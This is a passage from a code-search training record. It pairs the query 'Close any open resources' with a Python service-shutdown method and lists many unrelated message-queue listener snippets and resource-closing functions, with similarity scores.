run(self):\n print('starting up on {} port {}'.format(*self.listener_address))\n self.selector.register(self.listener, selectors.EVENT_READ)\n\n # Serialize our listener's host and port\n serializedAdd = fxp_bytes_subscriber.serialize_address(\n self.listener_address[0], self.listener_address[1])\n\n # Contact with Publisher\n self.listener.sendto(serializedAdd, self.gcd_address)\n\n while True:\n events = self.selector.select(CHECK_INTERVAL)\n for key, mask in events:\n data = self.receive_message()\n self.removeOldQuote()\n self.createGraph(data)\n self.arbitrage()\n self.checkTimeout()", "def start(self) -> None:\n conn_manager = ConnectionManager(broker_host=self.broker_host, queue=self.queue)\n channel = conn_manager.start_channel()\n channel.basic_consume(queue=self.queue, on_message_callback=self.callback)\n\n try:\n print(\"PV Simulator...\")\n channel.start_consuming()\n except KeyboardInterrupt:\n pass", "async def start(self):\n\n while True:\n try:\n data = await self.reader.read(8192)\n\n if self._trace_enabled:\n self._logger.trace(\n \"Received %d bytes from remote server:\\n%s\",\n len(data),\n msg.dump(data),\n )\n await self.process(data)\n except asyncio.CancelledError:\n return\n except:\n logging.exception(\"Unhandled error in Message Reader\")\n raise", "async def consume_items_from_rabbitmq(queue):\n ctr = 0\n start = time.time()\n while True:\n await asyncio.sleep(0.001)\n for method_frame, properties, body in channel.consume(queue_name, inactivity_timeout=1):\n if method_frame:\n # print(body)\n while queue.full():\n await asyncio.sleep(0.001)\n # await queue.put(body)\n queue.put_nowait(body)\n # Acknowledge the message\n channel.basic_ack(method_frame.delivery_tag)\n ctr += 1\n if not ctr % 1000:\n end = time.time() - start\n print(f'elapsed time: {end:.3f}\\tmessages received: {ctr}')\n else:\n # empty remaining items from queue\n while queue.qsize():\n await asyncio.sleep(0.001)\n end = time.time() - start\n print(f'elapsed time: {end:.3f}\\tmessages received: {ctr}')\n break\n await asyncio.sleep(0.001)\n\n requeued_messages = channel.cancel()", "def on_queue_declared(frame):\n channel.basic_consume(handle_delivery, queue='test')", "def read(self):\n log.info(\"==>\")\n # TODO exceptions\n assert self.subscription_list is not None\n if not self.is_once():\n assert self.read_queue is not None\n event = None\n first_sample = True\n while True:\n log.debug(\"Processing event type %s\", event)\n # SAMPLE is handled in the same way as \"first_sample\"\n if first_sample or event == self.SubscriptionEvent.SAMPLE:\n response = self.sample(\n start_monitoring=self.is_monitor_changes() and first_sample)\n yield response\n if first_sample:\n yield self.sync_response()\n first_sample = False\n if self.is_once():\n break\n elif event == self.SubscriptionEvent.FINISH:\n log.debug(\"finishing subscription read\")\n break\n elif event == self.SubscriptionEvent.SEND_CHANGES:\n response = self.changes()\n log.debug(\"Sending changes\")\n yield from response\n elif event is None:\n log.warning(\"**** event is None ! ****\")\n # TODO error\n break\n else:\n log.warning(\"**** event=%s not processed ! ****\", event)\n # TODO error\n break\n log.debug(\"Waiting for event\")\n event = self.read_queue.get()\n log.debug(\"Woke up event=%s\", event)\n if self.is_monitor_changes():\n self.stop_monitoring()\n\n log.info(\"<==\")", "async def pubsub_loop(self) -> None:\n logged_method = \"pubsub_loop\"\n self.logger.debug(logged_method, \"started\")\n\n while 1:\n have_message = await self.pubsub_channel.wait_message()\n if not have_message:\n break\n msg = await self.pubsub_channel.get(encoding=\"utf-8\", decoder=loads)\n self.logger.debug(logged_method, f\"got message {msg}\")\n\n if msg[\"cmd\"] == \"stop\":\n await self._pause_behaviors()\n\n elif msg[\"cmd\"] == \"start\":\n await self._resume_running_behaviors()\n\n elif msg[\"cmd\"] == \"shutdown\":\n self.shutdown_condition.initiate_shutdown()\n\n self.logger.debug(logged_method, \"waiting for another message\")\n\n self.logger.debug(logged_method, \"stopped\")", "def amqp_process_for_nfvi_kpi(self):\n if self.amqp_client is None and self.enable:\n self.amqp_client = multiprocessing.Process(\n name=\"AmqpClient-{}-{}\".format(self.mgmt['ip'], os.getpid()),\n target=self.run_collectd_amqp)\n self.amqp_client.start()", "def on_message_received(ch, method, properties, body):\n # the body contains the command flag followed by a colon ':' and the message for the drone\n # decode the body to utf8\n received_bytes = body.decode('utf-8')\n # split the received_bytes to get the command _flag and message\n recieved_message = received_bytes.split(':')\n # since rabbit mq body is a byte\n if (str(recieved_message[0]) == \"c01\"):\n # c01 - command center orders the drone to deliver a item\n print(\"Order Received from the command center to deliver an item to the following address \\n\", str(\n recieved_message[1]))\n time.sleep(2)\n # print in the drone's console that the item has been lift off\n print('\\nLifting off the Item to the delivery address.')\n print('\\nUpdating Status to the command centre ......')\n # Assume the drone has reached the delivery address . Now send a\n # message to the warehouse command center that it has reached the\n # delivery area\n time.sleep(5)\n rpc_sendback(\"c02\")\n # Assume the drone has delivered the item and issue the status message\n # to the command center\n time.sleep(5)\n rpc_sendback(\"c03\")\n # #Assume the drone has reached the parking spot and issue the message to the command center that is available for next instruction\n time.sleep(5)\n rpc_sendback(\"c04\")\n\n else:\n print(\"Received Instruction from Warehouse \" +\n str(recieved_message[1]))\n channel.basic_ack(delivery_tag=method.delivery_tag)\n # channel.start_consuming()", "def _listen_queue(self, queue, callback):\n # Listen buy/sell orders from external system\n self._logger.info(f\"Declaring rabbit queue {queue}\")\n self._consumer_rabbit_channel.queue_declare(queue=queue, durable=True, auto_delete=True)\n self._logger.info(f\"Declaring callback to rabbit queue: {queue}, callback: {callback}\")\n self._consumer_rabbit_channel.basic_consume(queue, callback,\n consumer_tag=queue)", "def start(self):\n\n # Start listening for records\n self._run_loop(True)\n # There might still be records in the queue.\n self._run_loop(False)", "def _listen_to_queues(cls):\n queues = cls.get_service_queues()\n for queue in queues:\n queue.consume(cls.process_messages)", "def test_dispatch_event(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [])\n msg = msg_helper.make_ack()\n yield worker_helper.dispatch_event(msg, 'fooconn')\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [msg])", "def on_queue_declared(frame):\n start_consuming(frame)", "def __init__(self, bot_id, exchange, callback_func, rabbit_user, rabbit_pw, rabbit_host,\n rabbit_port, consumer_id = 0, internal_error_queue = None, statsd = None):\n\n super(RabbitConsumer, self).__init__()\n\n self.rabbit_port = rabbit_port\n self.rabbit_host = rabbit_host\n self.rabbit_pw = rabbit_pw\n self.rabbit_user = rabbit_user\n self.bot_id = bot_id\n self.exchange = exchange\n self.callback_func = callback_func\n self._closing = False\n self.stopped = False\n self._connection = None\n self._channel = None\n self._closing = False\n self._consumer_tag = None\n\n self.queue_name = self.exchange + \"-\" + self.bot_id\n self.error_queue_name = 'error-' + self.bot_id + \"-\" + self.exchange\n self.consumer_id = consumer_id\n self.internal_error_queue = internal_error_queue\n\n self.statsd = statsd\n\n self.statsd_prefix = self.exchange + \".\"\n\n self.invocations = 0\n self.total_execution_time = 0", "def handleIncoming(self):\r\n\t\trawQueue = list()\r\n\r\n\t\twhile True:\r\n\t\t\tif not self.activeConnection:\r\n\t\t\t\ttime.sleep(.1)\r\n\t\t\t\tcontinue\r\n\t\t\ttry:\r\n\t\t\t\trawQueue.append(self.serialPort.read(1).decode('ascii'))\r\n\t\t\texcept serial.serialutil.SerialException as e:\r\n\t\t\t\tcontinue\r\n\t\t\t# print(rawQueue[-1], int.from_bytes(rawQueue[-1], byteorder='big'))\r\n\t\t\t# if len(rawQueue) >= 1000:\r\n\t\t\t# \trawQueue.pop(0)\r\n\t\t\t# print(rawQueue)\r\n\t\t\tif rawQueue[0] != '$': # we pop items until the first one is a $ sign\r\n\t\t\t\t# print('popping the first character')\r\n\t\t\t\trawQueue.pop(0)\r\n\t\t\tif '\\n' in rawQueue: # we assume with the \\n we have a valid message\r\n\t\t\t\t# print('valid message')\r\n\t\t\t\trawQueue.pop(0) # remove the $\r\n\t\t\t\trawPayload = rawQueue[0:rawQueue.index(\"*\")]\r\n\t\t\t\tstringPayload = \"\".join(rawPayload)\r\n\t\t\t\tvalueList = stringPayload.split(\",\")\r\n\t\t\t\t# print(valueList)\r\n\t\t\t\tfor i in range(1, len(valueList)):\r\n\t\t\t\t\tvalueList[i] = int(valueList[i])\r\n\t\t\t\tvalueList[0] = messageTypes[valueList[0]]\r\n\r\n\t\t\t\tself.eventQueue.put(valueList)\r\n\t\t\t\trawQueue.clear()\r\n\t\t\t\t# print(valueList)\r\n\t\t\t\t# we are going to ignore checksums for now\r", "def run(self):\n self._no_tb = False\n self.traceback = None\n queues = (queue.attr, queue.clean) + queue.queues\n try:\n self.start.emit()\n while True:\n events = 0\n while len(self._events):\n events += 1\n if events == 50:\n self._queue(0)\n events = 0\n self.event_count += 1\n func, args, kwargs, tb_slot, tbs_time, tb_call, tbc_time = self._events.popleft()\n self._construct_tb((tb_slot, \"signal connection <%.4f>\" % (tbs_time - log.start_time)),\n (tb_call, \"signal emitter <%.4f>\" % (tbc_time - log.start_time)))\n func(*args, **kwargs)\n self._clear_tb()\n\n for q in queues:\n if len(q.active):\n break\n else:\n # Die if no events or outstanding processes\n break\n\n self._queue()\n\n finally:\n self.stop.emit()", "def process_incoming_rabbit_mq(self):\n self.groomer_state = \"3:PROCESS QUEUE\"\n lock_counter = 0\n while not self.incoming_queue_lock.acquire(False):\n self.my_local_logger.debug(\"Trying to acquire lock. Sleeping 0.05s.\")\n time.sleep(g_config.SLEEP_TIME)\n lock_counter += 1\n if lock_counter > 100:\n self.my_local_logger.debug(\"Cant acquire incoming queue lock, returning\")\n self.my_local_logger.error(\"Unable to acquire lock in process_incoming_queue, returning!\")\n self.groomer_state = \"4:PROCESS QUEUE LOCK ERROR\"\n return\n while not self.incoming_rabbit_mq.empty():\n self.my_local_logger.debug(\n \"Groomer says Incoming Rabbit MQ not empty, length is %d\" % self.incoming_rabbit_mq.qsize())\n self.my_local_logger.debug(\"Acquired lock\")\n # This is where the incoming grooming message is pulled off the Rabbit MQ.\n dequeued_item = self.incoming_rabbit_mq.get()\n if self.check_message_payload(dequeued_item):\n self.my_local_logger.info(\"A %s type message was dequeued \" %\n dequeued_item['messageType'])\n else:\n self.my_local_logger.error(\"Message payload is malformed in process_incoming_queue, returning\")\n if self.incoming_queue_lock:\n self.incoming_queue_lock.release()\n self.my_local_logger.debug(\"GROOMER rabbit MQ lock was released\")\n self.my_local_logger.info(\"The rabbit MQ lock was released\")\n self.groomer_state = \"5:PROCESS QUEUE MALFORMED\"\n return\n # Determine what is queue command type is and dispatch it.\n if dequeued_item['messageType'] == 'Test':\n # This is a dummy Test which is dropped for now.\n pass\n elif dequeued_item['messageType'] == 'Clear':\n # Restore the previous results\n pass\n elif dequeued_item['messageType'] == 'Save':\n # Save the current groom (filter) settings and kick off a new Utility wide groom process\n\n # Grab the Query message type and stuff it in a local fifo queue\n self.my_local_logger.debug(\"Save type message received\")\n self.my_local_logger.debug(\"query_guid = %s\" % \"None - missing on save\") # dequeued_item['queryGuid'])\n #######################################################\n # Collect interesting payload information here\n #######################################################\n if \"ttl\" not in dequeued_item.keys():\n dequeued_item[\"ttl\"] = g_config.TTL_UTILITY_SPAN\n self.local_q.append(dequeued_item)\n self.my_local_logger.debug(\"Message queued to the local incoming queue (len=%d)\" % len(self.local_q))\n self.my_local_logger.info(\"Message queued to the local incoming queue (len=%d)\" % len(self.local_q))\n pass\n elif dequeued_item['messageType'] == 'Query':\n # Grab the Query message type and stuff it in a local fifo queue\n self.my_local_logger.debug(\"Query type message received\")\n self.my_local_logger.debug(\"query_guid = %s\" % dequeued_item['queryGuid'])\n #######################################################\n # Collect interesting payload information here\n #######################################################\n if \"ttl\" not in dequeued_item.keys():\n dequeued_item[\"ttl\"] = g_config.TTL_MAX\n self.local_q.append(dequeued_item)\n self.my_local_logger.debug(\"Message queued to the local incoming queue (len=%d)\" % len(self.local_q))\n self.my_local_logger.info(\"Message queued to the local incoming queue (len=%d)\" % len(self.local_q))\n else:\n self.my_local_logger.error(\"incoming_rabbit_mq TYPE is a UNKNOWN\")\n if self.incoming_queue_lock:\n self.incoming_queue_lock.release()\n self.my_local_logger.debug(\"GROOMER rabbit MQ lock was released\")\n self.my_local_logger.info(\"The rabbit MQ lock was released\")\n self.my_local_logger.debug(\"process_incoming_rabbit_mq finished\")\n self.groomer_state = \"0:IDLE\"", "def prepare(self):\r\n self.socket.listen()\r\n for _ in xrange(self.threads):\r\n thread = Worker(self.tasks)\r\n thread.setDaemon(True)\r\n thread.start()\r\n self.prepared = True", "def subscribeConsumer(consumer):", "def run(self):\n self.listen(self.input_topics.filter_by(transmission='tcp'))\n\n logging.info('Getting into the listening loop')\n self.running = True\n while self.running:\n self.loop()", "def processEvents(self):\n if not self.getIsConnected():\n return\n\n # Loop until there is no more data in the receive buffer.\n while True:\n if not self._socketPoller.isReady():\n # There is no data waiting.\n return\n\n nBytesRead, _ = self._socket.recvfrom_into(self._buffer)\n if nBytesRead <= 0:\n # Since we checked for data ready, we don't expect this.\n return\n\n # _bufferView is a memoryview, so we can slice efficienty.\n self._elementReader.onReceivedData(self._bufferView[0:nBytesRead])", "def start_amqp(self):\n try:\n self.conn = amqp.Connection(self.amqp['host'], self.amqp['user'],\n self.amqp['password'],\n virtual_host=self.amqp['vhost'])\n self.channel = self.conn.channel()\n self.channel.exchange_declare(self.amqp['routing_key'], 'fanout')\n except socket.error:\n return False\n return True", "def event_queue_proc(self,event):\r\n event()", "def __init__(self):\n self.connection = pika.BlockingConnection(\n pika.ConnectionParameters(host='localhost'))\n self.channel = self.connection.channel()", "def start_task():\n get_results_from_message_queue()\n test_all_servers_connection()", "def main():\n configure_logging()\n\n # Attributes tell us what subscription has been created for us to listen to.\n project = get_metadata('instance/attributes/pubsub_subscription_project')\n service_account = get_metadata('instance/attributes/pubsub_service_account')\n subscription = get_metadata('instance/attributes/pubsub_subscription')\n pubsub = PubSub(service_account=service_account)\n\n while True:\n logging.info('Polling for new messages')\n ack_ids = []\n start_time = time.time()\n response = pubsub.pull(subscription, project)\n for message in response.get('receivedMessages', []):\n ack_ids.append(message['ackId'])\n attributes = message['message'].get('attributes', {})\n message = base64.b64decode(message['message'].get('data', ''))\n logging.info(\n 'Received message: %s\\nAttributes: %s',\n message,\n json.dumps(attributes, indent=2),\n )\n\n if message == 'CONNECT' and attributes.get('swarming_server'):\n if os.path.exists(SWARMING_UPSTART_CONFIG_DEST):\n os.remove(SWARMING_UPSTART_CONFIG_DEST)\n shutil.copy2(SWARMING_UPSTART_CONFIG_SRC, SWARMING_UPSTART_CONFIG_DEST)\n\n if not os.path.exists(SWARMING_BOT_DIR):\n os.mkdir(SWARMING_BOT_DIR)\n chrome_bot = pwd.getpwnam(CHROME_BOT)\n os.chown(SWARMING_BOT_DIR, chrome_bot.pw_uid, chrome_bot.pw_gid)\n\n if os.path.exists(SWARMING_BOT_ZIP):\n # Delete just the zip, not the whole directory so logs are kept.\n os.remove(SWARMING_BOT_ZIP)\n\n bot_code = urllib2.urlopen(urlparse.urljoin(\n attributes.get('swarming_server'), 'bot_code'))\n with open(SWARMING_BOT_ZIP, 'w') as fd:\n shutil.copyfileobj(bot_code, fd)\n os.chown(SWARMING_BOT_ZIP, chrome_bot.pw_uid, chrome_bot.pw_gid)\n\n pubsub.acknowledge(subscription, project, ack_ids)\n subprocess.check_call(['/sbin/shutdown', '-r', 'now'])\n elif message == 'LEASED' and attributes.get('lease_expiration_ts'):\n with open(LEASE_EXPIRATION_FILE, 'w') as f:\n f.write(attributes['lease_expiration_ts'])\n\n if ack_ids:\n pubsub.acknowledge(subscription, project, ack_ids)\n if time.time() - start_time < 1:\n # Iterate at most once per second (chosen arbitrarily).\n time.sleep(1)", "def run(self):\n init()\n list_name = comet_config.REDIS_NAMESPACE + \"incoming/\" + self.service_name\n list_name_processing = list_name + \"/processing\"\n self.redis = r\n while True:\n try:\n item = self.redis.brpoplpush(list_name, list_name_processing)\n self.process_incoming(item)\n self.redis.lrem(list_name_processing, item)\n\n except redis.ConnectionError:\n pass", "def setUp(self):\n # This Queue and Pipe let heartbeat send and receive messages to the\n # fake child client processes, and have those messages processed here.\n self.queue = Queue()\n self.consumer_master, self.consumer_slave = multiprocessing.Pipe()\n self.monitor_master, self.monitor_slave = multiprocessing.Pipe()\n\n # Only one consumer\n self.consumer = ProcessData(process=self.MockProcess(id=0,\n name='TestConsumer'),\n pipe=self.consumer_slave)\n\n self.monitor = ProcessData(process=self.MockProcess(id=0,\n name='TestMonitor'),\n pipe=self.monitor_slave)\n\n # Messages that StorageHeartbeat puts on the socket for the server\n # Are quickly decoded again and put on this queue for verification\n self.socket_queue = Queue()\n\n # We use MockSocket to impersonate a real socket\n self.socket = self.MockSocket(self.socket_queue, self)\n\n self.dut = StorageHeartbeat(consumers=[self.consumer],\n monitor=self.monitor,\n report_in=self.queue,\n runtime=10,\n poll_period=5,\n client_socket=self.socket)", "def run(self) -> None:\n\n while not self.stop_event.is_set():\n if self.my_queue:\n # if heartbeat received at '/heartbeat' route from the monitored peer,\n # sleep until next\n self.my_queue.clear()\n time.sleep(7)\n\n else:\n # else drop peer data from database and inform central server appending '0'\n # to my queue\n self.db_access.drop_peer(self.peer_id)\n self.my_queue.append(0)\n break", "def on_queue_declared(self, frame):\n\t\tself.channel.basic_qos(prefetch_count=1)\n\t\tself.channel.add_on_cancel_callback(self.on_consumer_cancelled)\n\t\tself.consumer_tag = self.channel.basic_consume(\n\t\t\tself.handle_delivery, \n\t\t\tframe.method.queue\n\t\t)", "def configure_rabbit (ec2_conn,base_name,params ):\n print \"configuring rabbitmq exchanges and Queues\"\n app_type = 'RABBITMQ'\n \n logging.basicConfig()\n \n ## Allow security from build server to rabbitmq\n rabbit_lb_sec_grp_name = get_lb_secgrp_name( base_name, app_type )\n rabbit_lb_sec_grp = find_secgrp(ec2_conn, rabbit_lb_sec_grp_name)\n \n try :\n rabbit_lb_sec_grp.authorize( ip_protocol = \"tcp\",\n from_port = 8443,\n to_port = 8443,\n cidr_ip = build_server_cidr )\n except :\n print \"rule exists aready\" \n \n \n rabbitmq_host = params.get( 'host' )\n rabbitmq_port = params.get( 'port' )\n rabbitmq_username = params.get( 'user-name' )\n rabbitmq_password = params.get( 'password' )\n exchanges = params.get( 'exchanges' )\n \n amqp_url='amqp://'+rabbitmq_username+':'+rabbitmq_password+'@'+rabbitmq_host+':'+rabbitmq_port+'/%2f'\n amqp_url = str(amqp_url)\n parameters = pika.URLParameters(amqp_url)\n connection = pika.BlockingConnection(parameters)\n channel = connection.channel()\n \n \n \n for exchnage in exchanges :\n exchange_name = exchnage.get(\"name\")\n exchange_type = exchnage.get(\"type\")\n queue_name = exchnage.get(\"queue\")\n routings = exchnage.get(\"bindings\")\n channel.exchange_declare(exchange=exchange_name,\n exchange_type=exchange_type,\n durable=True )\n channel.queue_declare(queue=queue_name,\n durable=True)\n for routing in routings :\n channel.queue_bind(queue=queue_name, exchange=exchange_name, routing_key=routing)\n print \"binging exchnage: \" +exchange_name+\", to a queue:\"+queue_name+\" ,with routing key:\"+routing\n \n ## close connection at the end \n connection.close()\n \n ## At the end revoke the build server rule \n try :\n rabbit_lb_sec_grp.revoke( ip_protocol = \"tcp\",\n from_port = 8443,\n to_port = 8443,\n cidr_ip = build_server_cidr)\n \n except :\n print \"exception removing rule\"", "def run():\n listen_active_email_channel()", "def subscribe(receiver, catchup):", "def __init__(self, config):\n self.config = config\n self.received_messages = []\n self.processed_messages = []\n\n self.setup()", "def processIncoming(self):\n while self.queue.qsize():\n try:\n # print 'queue'\n msg = self.queue.get(0)\n # Check contents of message and do what it says\n # As a test, we simply print it\n if msg == \"exit\":\n self.deviceError()\n if msg == \"error\":\n self.deviceError()\n else:\n self.decode(msg)\n except Queue.Empty:\n pass", "def listener():\n try:\n conn = connect_to_db()\n\n LOGGER.info(\"Reading queued Sawtooth transactions\")\n while True:\n feed = r.table(\"inbound_queue\").order_by(index=r.asc(\"timestamp\")).run(conn)\n count = 0\n for rec in feed:\n LOGGER.debug(\"Processing inbound_queue record\")\n LOGGER.debug(rec)\n process(rec, conn)\n count = count + 1\n if count == 0:\n break\n LOGGER.info(\"Processed %s records in the inbound queue\", count)\n LOGGER.info(\"Listening for incoming Sawtooth transactions\")\n feed = r.table(\"inbound_queue\").changes().run(conn)\n for rec in feed:\n if rec[\"new_val\"] and not rec[\"old_val\"]: # only insertions\n LOGGER.debug(\"Processing inbound_queue record\")\n LOGGER.debug(rec[\"new_val\"])\n process(rec[\"new_val\"], conn)\n\n except Exception as err: # pylint: disable=broad-except\n LOGGER.exception(\"Inbound listener %s exception\", type(err).__name__)\n LOGGER.exception(err)\n\n finally:\n try:\n conn.close()\n except UnboundLocalError:\n pass", "def queue_processor(self):\n\n while self.state != consts.SMPP_CLIENT_STATE_CLOSED:\n try:\n p = self.queue.get(timeout=1)\n self._request_handler(p)\n self.queue.task_done()\n except Empty:\n pass", "def consume_messages(self):\n\n method_frame, properties, body = self.channel.basic_get(self.queue_name, no_ack=False)\n\n while method_frame:\n\n LOGGER.info(\"Message received\")\n\n self.channel.basic_ack(method_frame.delivery_tag)\n payload = json.loads(body)\n if not isinstance(payload, dict):\n return\n\n # Process the message\n if 'control' in payload:\n LOGGER.info(\"A control signal received!\")\n # self.set_control(payload['control'])\n print(payload['control'])\n\n # Continue getting messages\n method_frame, properties, body = self.channel.basic_get(self.queue_name, no_ack=False)\n\n # TODO\n # return control_signal", "async def declare_and_consume(self, handler):\n try:\n await self.declare()\n self.consume(handler)\n except pika.exceptions.ChannelClosed: # pragma: no cover\n self.reconnect()", "def listen(self):\n self.channel.start_consuming()", "def loop(self):\n _logger.info(\"Bus.loop listen imbus on db postgres\")\n # PATCH !!\n with odoo.sql_db.db_connect(_get_imbus_db()).cursor() as cr:\n conn = cr._cnx\n cr.execute(\"listen imbus\")\n cr.commit();\n while True:\n if select.select([conn], [], [], TIMEOUT) == ([], [], []):\n pass\n else:\n conn.poll()\n channels = []\n while conn.notifies:\n channels.extend(json.loads(conn.notifies.pop().payload))\n # dispatch to local threads/greenlets\n events = set()\n for channel in channels:\n events.update(self.channels.pop(hashable(channel), []))\n for event in events:\n event.set()", "def _run(self):\n print \"ZMQSubscriber: loop started\"\n port = \"5556\"\n context = zmq.Context()\n socket = context.socket(zmq.SUB)\n socket.connect(\"tcp://localhost:%s\" % port)\n # socket.setsockopt_string(zmq.SUBSCRIBE, u'') # get everything\n socket.setsockopt_string(zmq.SUBSCRIBE, u'[firewall]')\n socket.setsockopt_string(zmq.SUBSCRIBE, u'END')\n\n while self._do_work.is_set():\n try:\n data = socket.recv_string()\n # print \"Got data:\", repr(data)\n print data\n if data == 'END':\n self.stop()\n except Queue.Empty:\n pass\n\n print \"ZMQSubscriber: loop stopped\"", "def run(self):\n\n # waits for new messages and reacts based on message\n try:\n self.__email_handler.run()\n except KeyboardInterrupt:\n print('\\nClosing...\\n')\n except Exception as e:\n print(f'{self.__source}: and error has occured: %s' % e)", "def run(config, logging, inq, subscribe_callback, unsubscribe_callback):", "def process(self):\n\n self.wsRms.connect()\n\n self.scheduler = Scheduler(self)\n self.scheduler.setDaemon(True)\n self.scheduler.start()\n\n while not self.stop:\n json = self.wsEngine.receive()\n if json == None:\n time.sleep(1)\n continue\n print \"------->Receive from lib: %s\" %json\n message = Message().restore(json)\n\n if message.getCmd() == Message.CMD_REGISTER:\n self.waitingQueue.append(message)\n\n elif message.getCmd() == Message.CMD_RELEASE:\n self.wsRms.release(message.getRes())\n self.runningQueue.remove(message)\n\n self.scheduler.stop()", "def test_process_subscriptions(self):\n pass", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def collect(self):\n while True:\n if not self._queue.empty():\n message = self._queue.get()\n self.working_on = message['job_type']\n else:\n break\n logging.info(\"Popped off message: {}\\n\".format(str(message)))\n\n if message['job_type'] == 'STOP':\n break\n\n if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':\n raise ValueError('{} is not a recognized task type'.format(message['job_type']))\n pass\n\n # Query all repos with repo url of given task\n repoUrlSQL = s.sql.text(\"\"\"\n SELECT min(repo_id) as repo_id FROM repo WHERE repo_git = '{}'\n \"\"\".format(message['given']['github_url']))\n repo_id = int(pd.read_sql(repoUrlSQL, self.db, params={}).iloc[0]['repo_id'])\n\n try:\n if message['models'][0] == 'pull_requests':\n self.pull_requests_model(message, repo_id)\n elif message['models'][0] == 'pull_request_commits':\n self.pull_request_commits_model(message, repo_id)\n elif message['models'][0] == 'pull_request_files':\n self.pull_requests_graphql(message, repo_id)\n except Exception as e:\n register_task_failure(self, message, repo_id, e)\n pass", "def subscribe(self):\n with self._rabbit_connection.connection.channel() as channel:\n self._queue = rabbitpy.Queue(\n channel=channel,\n name=self._subscriber_name + \"_queue\",\n durable=True,\n message_ttl=5 * 24 * 60 * 60 * 1000 # 5 days\n )\n self._queue.declare()\n self._queue.bind(self._exchange, self._routing_key)\n\n self._consume()", "def starting(self):\n ident = self.ident()\n print('{} starting & consuming \"{}\".'.format(ident, self.to_consume))\n\n if self.max_tasks:\n print('{} will die after {} tasks.'.format(ident, self.max_tasks))\n else:\n print('{} will never die.'.format(ident))", "def doRead(self):\n if self.read_scheduled is not None:\n if not self.read_scheduled.called:\n self.read_scheduled.cancel()\n self.read_scheduled = None\n\n while True:\n if self.factory is None: # disconnected\n return\n\n events = self.socket_get(constants.EVENTS)\n\n if (events & constants.POLLIN) != constants.POLLIN:\n return\n\n try:\n message = self._readMultipart()\n except error.ZMQError as e:\n if e.errno == constants.EAGAIN:\n continue\n\n raise e\n\n log.callWithLogger(self, self.messageReceived, message)" ]
[ "0.7568344", "0.67390686", "0.6702978", "0.6613848", "0.65698355", "0.6562793", "0.65285885", "0.6489923", "0.6489923", "0.6489923", "0.64743716", "0.64450294", "0.63913554", "0.63741064", "0.62963545", "0.62910515", "0.6283345", "0.62690264", "0.6255861", "0.62298816", "0.6216329", "0.6198216", "0.61951655", "0.6176048", "0.6142124", "0.60997856", "0.6060243", "0.60539275", "0.60395885", "0.6017347", "0.601186", "0.60020995", "0.59957606", "0.5978966", "0.597641", "0.5958713", "0.5936582", "0.59230113", "0.59093016", "0.5906723", "0.58999825", "0.58811253", "0.5861857", "0.58432186", "0.58409595", "0.5823901", "0.58067787", "0.5802711", "0.58018523", "0.57569915", "0.57493454", "0.5742275", "0.57340074", "0.5718761", "0.5713176", "0.5709526", "0.5709069", "0.5658083", "0.56498927", "0.56435245", "0.5641897", "0.56383777", "0.56190044", "0.5583194", "0.5569084", "0.5563686", "0.5554278", "0.5542721", "0.553846", "0.5528842", "0.55273986", "0.55229574", "0.55198646", "0.5516872", "0.55136454", "0.55094266", "0.55087054", "0.55078924", "0.5505693", "0.5503922", "0.54990774", "0.5497655", "0.54975855", "0.5490809", "0.5486275", "0.5481875", "0.5475564", "0.54752964", "0.54737043", "0.5468555", "0.54681677", "0.54669315", "0.5451732", "0.5446248", "0.54456586", "0.54408604", "0.5436992", "0.543204", "0.5429696", "0.54296094" ]
0.62451327
19
Close any open resources
def on_stopping(self): self.logger.info("Got a shutdown of service") try: if self.connection is not None: self.connection.close() self.connection = None if self.processor_pool is not None: self.processor_pool.close() self.processor_pool.join() self.debug = self.forwarder_options.get("debug", "0") != "0" if self.debug: self.logger.setLevel(logging.DEBUG) except: self.logger.exception("Error stopping service")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def close():", "def finalize(self):\n self.ratings.close()\n self.users.close()\n self.movies.close()", "def close(self):\n for lrms in self.resources.itervalues():\n lrms.close()", "def do_close(self):\n self.cleanup(True)\n self.close()", "def close( self ):\n self.__del__()", "def close (self):\n pass\n #TODO: implement more realistic closing semantics", "def close(self):\r\n self._report_file.close()\r\n # Make sure everything's closed.\r\n for files in self._output_files.values():\r\n for f in files.values():\r\n f.close()", "def cleanup(self):\n self.io.close()", "def close (self):\n pass", "def __del__(self):\n self.close_files()", "def _CloseOutputFiles(self):\n self.gfile.close()\n self.efile.close()", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self):\n pass", "def close(self) -> None:\n ...", "def close(self) -> None:\n ...", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self) -> None:", "def close(self):\r\n pass", "def close(self):\r\n pass", "def close(self):\r\n pass", "def _close(self):\n for fd in self._fds:\n try:\n os.close(fd)\n except:\n pass", "def close(self):\n ...", "def close(self):\n ...", "def close(self):\n pass", "def close(self):\n pass", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def close(self):", "def __del__(self):\n for handle in self._filehandles:\n handle.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n self.close()", "def __del__(self):\n try:\n self.close()\n except:\n pass", "def Close(self):", "def close():\n sys.exit()", "def close(self) -> None:\r\n pass", "def _close(self):\n self.fh.close()", "def __del__(self):\n if self._close_on_exit:\n self.close()", "def __del__(self):\n\n if self._is_open:\n self.close()", "def close(self):\n self._close()", "def close(self):\n self._close()", "def close(self):\n self.fileobj.close()", "def close(self):\n self.fileobj.close()", "def close(self) -> 